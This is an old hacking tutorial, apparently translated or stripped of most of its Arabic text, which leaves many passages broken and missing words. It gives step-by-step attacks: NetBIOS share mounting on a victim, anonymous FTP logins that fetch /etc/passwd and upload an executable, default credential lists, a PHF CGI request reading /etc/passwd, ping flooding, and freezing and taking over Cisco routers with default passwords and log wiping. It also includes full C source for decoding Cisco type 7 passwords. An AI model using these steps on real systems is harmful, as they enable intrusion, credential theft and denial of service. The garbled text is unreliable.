
:

:
ping -t www.***.com

ping -t -a -f www.***.com

ping www.***.com

com/com.wav
com3/com3/.wav
com1/com.wav


ping -w timeout www.***.com

NETSTAT -S

NETSTAT -A


NETSTAT -N




NETSTAT -P

drwatson

NetBios Attack

Home Network
LAN WAN MAN

.
: IP

.
-1 IP
) 207.107.1.1 (.
-2 START RUN
CMD .
-3 Nbtstat A IP
: ADRESS IP
IP ADRESS . ENTER
-4 :
NetBIOS Remote Machine Name Table
____________________________________
Name               Type    Status
------------------------------------------
J-1          <00>  UNIQUE  Registered
WORK         <00>  GROUP   Registered
J-1          <03>  UNIQUE  Registered
J-1          <20>  UNIQUE  Registered
WORK         <1E>  GROUP   Registered
WORK         <1D>  UNIQUE  Registered
__MSBROWSE__.<01>  GROUP   Registered
:

.
-5 >< HEX
CODE VALUE 20
PRINTER
OR FILES SHARED TURNED ON



.
-6


:
Net view \\<insert ip_address here>
-7
:
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk
-8 TEMP
:
Net use x: \\<insert IP address here>\temp
NSETBIOS


..
*

User name-Password

PASSWD


FTP=File Transfer Protocol



start==>run
telnet
Remote System
==> connect
Host Name
kahane.org
PORT 21

connect
..
!! source code
user anonymous

pass zzzoozz@yahoo.com



..



cute ftp - ws_ftp


ftp.kahane.org

retr /etc/passwd

etc/ passwd


Sunos 5.0 etc/shadow etc/passwd
Linux etc/shadow etc/passwd
BSD4.3 RENO etc/master.passwd
AIX etc/security/passwd
NT scripts/passwd
passwd
admin.pwl
exe
-:
<< command )
start>runcopy server.exe server.com
server
com,scr,bat



.

netstat
===========================
===================
NETSTAT


NETSTAT -A

NETSTAT -E

NETSTAT -N

NETSTAT -P

NETSTAT -R

NETSTAT -S

:
FTP

21

FTP


Superscanne



Start

Run

ftp n

FTP>


Open

Enter

FTP>
To

To
IP


Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).

ftp>quote user ftp

331 Anonymous acces allowed, send identify (e-mail name) as password.

ftp>quote cwd ~root

530 Please login with USER and PASS

ftp>quote pass ftp

230 Anonymous user logged in.







20




Pwd

Cd

Cd black

Ls

Get

Get black.exe
Put
**
Get



Put black.exe
Clos




Codes: Meaning
110 Restart marker reply.
120 Service ready in nnn minutes. (nnn is a time)
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message.
215 NAME system type.
220 Service ready for new user.
221 Service closing control connection.
225 Data connection open; no transfer in progress.
226 Closing data connection.
227 Entering passive mode (h1, h2, h3, h4, p1, p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Service not available, closing control connection.
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. (File already in use by something else)
451 Requested action aborted: local error processing.
452 Requested action not taken. (Not enough memory to carry out the action)
500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. (File not found, no access possible, ...)
551 Requested action aborted: page type unknown.
552 Requested file action aborted.
553 Requested action not taken. (File name not assigned)
----------------------- :


...

Telnet://IPNumberort IPNumber
port

:
)32 - 25 - 21( 2001 - 99 -


==================
3 :

) ShadowSecurityScanner
(
http://packetstorm.securify.com/

. SSS


:
:
anonymous : anonymous
guest : guest
root : root

sys : sys
sys : sysadm
sys : system
games : games
ftp : ftp
mail : mail
)
** Unix
( :
young
test

unpassworded accounts
.
:
GET /etc/passwd GET /etc/group
GET /etc/shadow
: :
data = download
.
===========================
========
? psswd

...
. root
: root



su username .
:
1

/etc .
2 shadow
shadow . unshadow
3 ..


...
:
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
:
1 . sirhack :
2 . 89fGc%^7 :
3 . Sir Hackalot :
4 /usr/sirhack :
5 ) ** **( :
/bin/sh
.
===========================
========
? group

) (
passwd .
===========================
========
? shadow
psswd
...
===========================
========

:

1 . Cracker Jack
2 . John the ripper

**)**( ...
**
http://www.openwall.com/john/john1.6.tar.gz

http://www.openwall.com/john/john16w.zip
+++++++++++++++++++++++++++
+++++++++++++++++++++++






enter :
**

HELP = HELP
COPY = CP
MOVE = MV
DIR = LS
DEL = RM
CD = CD


WHO
) FINGER (
FINGER


:
**
/etc directory
passwd



Cracker Jack


http://www.geocities.com/SiliconValley/9185

sable.ox.ac.uk/pub/wordlists
4 8

Cracker Jack


)(:




anonymously

ftp
/etc directory


Cracker Jack

PHF

**
http://xxx.xxx.xxx/cgi-bin/phf?Qali...t
%20/etc/passwd
**


backup
/etc/shadow

apache

:

UNIX,linux, aix, irix, ultrix, bsd, or


(sometimes even DOS or Vax / Vms
: **


** **


**






+++++++++++++++++++++++++++
port

) (

......


)
( .
:
:
Start&gRun & l

command.com
:
ping host
:
ping port
enter
:
ping port1027
enter
:
ping port80
enter
:
ping

enter
:
ping port
enter
..

.
===========================
===========
&&&&&&&&&&&&&&&&&&&

netbios
http://digitalx.150m.com/1.htm
&&&&&&&&&&&&&&&&&&&

dos

^^^^^^^^^^^^^^^^^^^^^^^
http://b0iler.eyeonsecurity.net/tutorials/powerdos.htm

Exploiting Cisco Systems


Dr^FunnY :
Hackerz-Boss@hackermail.com
------------------------------------

Hacking
Networks Routers

.


Cisco Routers

... Cisco Systems

:
, cisco systems
,
.




------------------------------------ :
------------------------------------ :
IP ISP TCP/IP packet - spoof IP

Telnet HyperTerminal Ping TraceRoute proxy server--------------------------------------- : ciscorouter


: cisco router : cisco router
: cisco router
-------------------------------------- :
-------------------------------------- : IP IP , Internet Protocol

,


, IP
IP
.

,,,,
:
log
IRC
ICQ
" "do not show ip

" "systat

IP- logging java

IP

Sub7 .NetBus
-------------------------------------------- : ISP ISP Internet Service
Provider

,,, dial-up

traceroute ISP
..
:
tracert 222.222.22.22
Tracing route to [221.223.24.54]
over a maximum of 30 hops.
 1  147ms 122ms 132ms  your.isp [222.222.22.21]
 2  122ms 143ms 123ms  isp.firewall [222.222.22.20]
 3  156ms 142MS 122ms  aol.com [207.22.44.33]
 4  *     *     *      Request timed out
 5  101ms 102ms 133ms  cisco.router [194.33.44.33]
 6  233ms 143ms 102ms  something.ip [111.11.11.11]
 7  222ms 123ms 213ms  netcom.com [122.11.21.21]
 8  152ms 211ms 212ms  blahblah.tts.net [121.21.21.33]
 9  122ms 223ms 243ms  altavista.34.com [121.22.32.43] <<< target's isp
10  101ms 122ms 132ms  221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.
----------------------------------: TCP/IP packet -

TCP/IP Transmission Control


Protocol .. Internet Protocol TCP/IP
packet
,
, header

,
, header

,
packet



... ..


... .
-------------------------------------------- spoof : IP Genius 2
.. DC IS
,, IdentD
,
IRC

spoof

...

logs

-------------------------------------------- : Telnet telnet


Start Menu Run
Telnet
, Terminal > Preferences
buffer size font ,
". "local echo
local echo


.

telnet port , 23


25 21
FTP ,,,,
.
-------------------------------------------- : HyperTerminal HyperTerminal " "server



HyperTerminal > Start
> Programs > Accessories

. Communications > HyperTerminal


..
" "TCP/IP Winsock
.. Call

listening
Call > Wait for
, Call Chat

-------------------------------------------- : Ping Ping ,
MS-DOS prompt
" , "ping ip.address
,
:
""ping ip.address -t
,
.. :
""ping -l (size) ip.address
Ping

,
.
Ping
ping floods

Windows 98 .
ping
flood ,

bandwidth
.
Ping flooding


: t-
,
. Unix
Linux ping -f

-------------------------------------------- : TraceRoute TraceRoute
,
,
MS-DOS prompt
" "tracert ip.address

.
firewalls ISP
) (internet service provider

TraceRoute :
TraceRoute
TCP/IP
packet header
, TTL
. Time To Live
TTL
,
..




, bandwidth TTL
..
ICMP





TraceRoute
-------------------------------------------- : proxy server
proxy server ,

telnet hyperterminal



===========================
===================
: cisco router
..
cisco router


..


...
cisco routers
:
T1 18
,
...

ISP
ISP


...
DENIAL OF SERVICE




Telnet .

packets

decoded

....

trusted systems
rcp rsh

)
rcp rsh
( Network Services
------------------------------------------------------------------- : cisco router

, ISP



traceroute
ISP )
( ISP traceroute
IP
ISP
...
, :
tracert 222.222.22.22
Tracing route to [221.223.24.54]
over a maximum of 30 hops.
 1  147ms 122ms 132ms  your.isp [222.222.22.21]
 2  122ms 143ms 123ms  isp.firewall [222.222.22.20]
 3  156ms 142MS 122ms  aol.com [207.22.44.33]
 4  *     *     *      Request timed out
 5  101ms 102ms 133ms  cisco.router [194.33.44.33]
 6  233ms 143ms 102ms  something.ip [111.11.11.11]
 7  222ms 123ms 213ms  netcom.com [122.11.21.21]
 8  152ms 211ms 212ms  blahblah.tts.net [121.21.21.33]
 9  122ms 223ms 243ms  altavista.34.com [121.22.32.43] <<< target's isp
10  101ms 122ms 132ms  221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.


,
firewall
Ping ,

firewall
firewall

firewall

23 ....

.. ,


..
,
.

..
proxy server
23
LOGs
------------------------------------------------------------------- : cisco router

v4.1 software
.
23
:
..
reboot ,
offline .
..
freeze 10-2


.. v4.1 software
,
DOS
.. ,
", "ping -l 56550 cisco.router.ip -t

frozen
..
)
(
" .... "admin

default
password ,
frozen
default

,

prompt " :
, "htl-textil "?"


, transfer
.. command
)
( IP
.. 23
:
) HyperTerminal
(
wait for a call
..

.
..
HyperTerminal
, yes
.
.. history

""history size 0
Logout

...


-------------------------------------------------------------------- : cisco router




. ..
John the Ripper
.
.
,
..
..


. compile

Ctli + Shift

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* XOR key table for the reversible Cisco "type 7" password encoding. */
char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;

/* Decode enc_pw (two-digit seed followed by hex pairs) into dec_pw, which
 * holds dec_size bytes. Returns 0 on success, -1 on malformed input. */
int cdecrypt(char *enc_pw, char *dec_pw, size_t dec_size)
{
    unsigned int seed, i, val = 0;
    size_t len = strlen(enc_pw);

    if (len & 1)
        return -1;
    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;
    seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
    if (seed > 15)
        return -1;
    /* len/2 - 1 characters are produced, plus the terminator; reject input
     * that would overrun the output buffer or the key table. */
    if (len / 2 > dec_size || seed + (len / 2 - 1) > sizeof(xlat))
        return -1;

    for (i = 2; i <= len; i++) {
        if (i != 2 && !(i & 1)) {
            /* A full hex pair has been read: emit one decoded byte. */
            dec_pw[i / 2 - 2] = val ^ xlat[seed++];
            val = 0;
        }
        val *= 16;
        if (isdigit((unsigned char)(enc_pw[i] = toupper((unsigned char)enc_pw[i])))) {
            val += enc_pw[i] - '0';
            continue;
        }
        if (enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
            val += enc_pw[i] - 'A' + 10;
            continue;
        }
        if (len != i)
            return -1;
    }
    /* Terminate directly after the last decoded character. */
    dec_pw[len / 2 - 1] = 0;
    return 0;
}

int usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> <output file>\n", pname);
    return 0;
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[65];
    unsigned int i, pw_pos;
    int c;

    pname = argv[0];
    if (argc > 1) {
        if (argc > 3) {
            usage();
            exit(1);
        }
        if (argv[1][0] == '-') {
            switch (argv[1][1]) {
            case 'h':
                usage();
                break;
            case 'p':
                if (argc < 3 || cdecrypt(argv[2], passwd, sizeof(passwd))) {
                    fprintf(stderr, "Error.\n");
                    exit(1);
                }
                fprintf(stdout, "password: %s\n", passwd);
                break;
            default:
                fprintf(stderr, "%s: unknown option.\n", pname);
            }
            return 0;
        }
        if ((in = fopen(argv[1], "rt")) == NULL)
            exit(1);
        if (argc > 2)
            if ((out = fopen(argv[2], "wt")) == NULL)
                exit(1);
    }

    while (1) {
        /* Read one line of the config, dropping carriage returns. */
        i = 0;
        while (i < 256) {
            if ((c = fgetc(in)) == EOF) {
                if (i)
                    break;
                fclose(in);
                fclose(out);
                return 0;
            }
            if (c == '\n')
                break;
            if (c != '\r')
                line[i++] = c;
        }
        pw_pos = 0;
        line[i] = 0;
        if (!strncmp(line, pw_str1, strlen(pw_str1)))
            pw_pos = strlen(pw_str1);
        if (!strncmp(line, pw_str2, strlen(pw_str2)))
            pw_pos = strlen(pw_str2);

        if (!pw_pos) {
            /* Not a password line: copy it through to the output unchanged. */
            fprintf(out, "%s\n", line);
            continue;
        }
        if (cdecrypt(&line[pw_pos], passwd, sizeof(passwd))) {
            fprintf(stderr, "Error.\n");
            exit(1);
        } else {
            if (pw_pos == strlen(pw_str1))
                fprintf(out, "%s", pw_str1);
            else
                fprintf(out, "%s", pw_str2);
            fprintf(out, "%s\n", passwd);
        }
    }
}
Linux
John the
. Ripper
--------------------------------------------John the Ripper
http://www.openwall.com/john/
-------------------------------------------



<1-99>           Session number to resume
access-enable    Create a temporary Access-List entry
access-profile   Apply user-profile to interface
clear            Reset functions
connect          Open a terminal connection
disable          Turn off privileged commands
disconnect       Disconnect an existing network connection
enable           Turn on privileged commands
exit             Exit from the EXEC
help             Description of the interactive help system
lock             Lock the terminal
login            Log in as a particular user
logout           Exit from the EXEC
mls              exec mls router commands
mrinfo           Request neighbor and version information from a multicast router
mstat            Show statistics after multiple multicast traceroutes
mtrace           Trace reverse multicast path from destination to source
name-connection  Name an existing network connection
pad              Open a X.29 PAD connection
ping             Send echo messages
ppp              Start IETF Point-to-Point Protocol (PPP)
resume           Resume an active network connection
rlogin           Open an rlogin connection
set              Set system parameter (not config)
show             Show running system information
slip             Start Serial-line IP (SLIP)
systat           Display information about terminal lines
telnet           Open a telnet connection
terminal         Set terminal line parameters
traceroute       Trace route to destination
tunnel           Open a tunnel connection
where            List active connections
x28              Become an X.28 PAD
x3               Set X.3 parameters on PAD
